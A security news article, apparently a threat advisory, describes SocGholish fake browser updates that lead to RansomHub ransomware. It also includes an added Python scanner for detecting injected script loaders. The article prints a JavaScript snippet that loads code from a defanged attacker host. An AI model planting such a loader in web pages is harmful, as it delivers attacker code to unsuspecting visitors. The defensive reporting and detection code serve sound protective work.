RansomHub via SocGholish, compromised sites

Threat actors behind SocGholish are now using hacked websites to spread RansomHub ransomware. The attack starts with compromised sites delivering malicious JavaScript to visitors.

RansomHub via SocGholish

SocGholish, a JavaScript-based malware, tricks users by posing as browser updates to deliver malicious files. It spreads through compromised websites, making detection challenging. When users visit these infected sites, they encounter fake browser update prompts.

Trend Micro researchers discovered this evolving threat targeting industries such as healthcare, finance, and manufacturing. The attackers have also enhanced their methods to evade detection and improve ransomware deployment.

The attack now ends with RansomHub ransomware, a rising threat known for strong encryption and evasion tactics.

Once activated, RansomHub encrypts files on local and network drives, demanding cryptocurrency for decryption. Investigators found obfuscated JavaScript injected into legitimate files or HTML content on compromised websites.

How the infection starts

The infection starts with compromised websites that run injected JavaScript to assess the visitor’s browser. The malicious code looks like this:

(function(){
    var d = document;
    var s = d.createElement('script');
    s.src = 'https://compromised-cdn[.]com/updater.js';
    d.getElementsByTagName('head')[0].appendChild(s);
})();

This harmless-looking code loads more scripts from attacker-controlled domains.

The second-stage JavaScript checks the environment to evade sandbox detection and analysis. It uses browser fingerprinting to identify Chrome, Firefox, or Edge before displaying a fake update notice.
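As an added example (not code from the article or from Trend Micro), the following Python scanner shows one way a site owner or SOC analyst could check fetched page HTML for inline loaders of the kind shown above: inline scripts that create a script element and point its src at a host outside the site's own allowlist. The sample HTML, the allowlisted host and the flagged domain are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Inline scripts that build a <script> element and set its src to an
# external host are the pattern SocGholish injects into compromised pages.
# Constructed example: flag such loaders whose host is not allowlisted.
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
CREATE_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I)
SRC_RE = re.compile(r"\.src\s*=\s*['\"]([^'\"]+)['\"]")


def normalize_host(url):
    """Refang 'example[.]com' / 'hxxps' and return the lowercase hostname."""
    url = url.replace("[.]", ".").replace("hxxp", "http")
    host = urlparse(url).hostname
    return host.lower() if host else None


def find_suspicious_loaders(html, allowed_hosts):
    """Return (host, url) pairs for dynamically injected script loaders
    whose destination host is not in allowed_hosts."""
    hits = []
    for inline in SCRIPT_TAG_RE.findall(html):
        if not CREATE_RE.search(inline):
            continue  # not a dynamic loader, skip
        for url in SRC_RE.findall(inline):
            host = normalize_host(url)
            if host and host not in allowed_hosts:
                hits.append((host, url))
    return hits


# Constructed sample page: one legitimate loader and one injected loader
# modelled on the snippet in the article (all domains are placeholders).
SAMPLE_HTML = """<html><head>
<script>
(function(){var d=document;var s=d.createElement('script');
s.src='https://cdn.example-shop.com/app.js';
d.getElementsByTagName('head')[0].appendChild(s);})();
</script>
<script>
(function(){
var d = document;
var s = d.createElement("script");
s.src = "https://compromised-cdn[.]com/updater.js";
d.getElementsByTagName("head")[0].appendChild(s);
})();
</script>
</head><body>shop</body></html>"""

ALLOWED = {"cdn.example-shop.com"}  # assumed allowlist for the sample site

if __name__ == "__main__":
    for host, url in find_suspicious_loaders(SAMPLE_HTML, ALLOWED):
        print(f"unallowlisted dynamic script loader -> {host} ({url})")
```

Running the scan periodically against a site's own pages, and diffing results against the previous run, surfaces a newly injected loader even when the domain has not yet appeared on any blocklist.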

[Figure: SocGholish flow: website compromise to payload delivery (Trend Micro)]

If users click the fake update, they download a ZIP file with malicious JavaScript. When executed, this file creates persistence through scheduled tasks and registry changes, then downloads the RansomHub payload from command-and-control servers.

The ransomware uses advanced techniques like process hollowing and API unhooking to bypass security tools. The attack ends with file encryption and a ransom note demanding payment.

To defend against this threat, experts recommend using strong web filtering, keeping browsers updated, and training users to spot fake update alerts.

Published: March 17th, 2025 (2025-03-18T06:45:29+05:30) | Categories: BOTNET, Compromised, Exploitation, Internet Security, Ransomware, Security Advisory, Security Update

About the Author: FirstHackersNews - Identifies Security
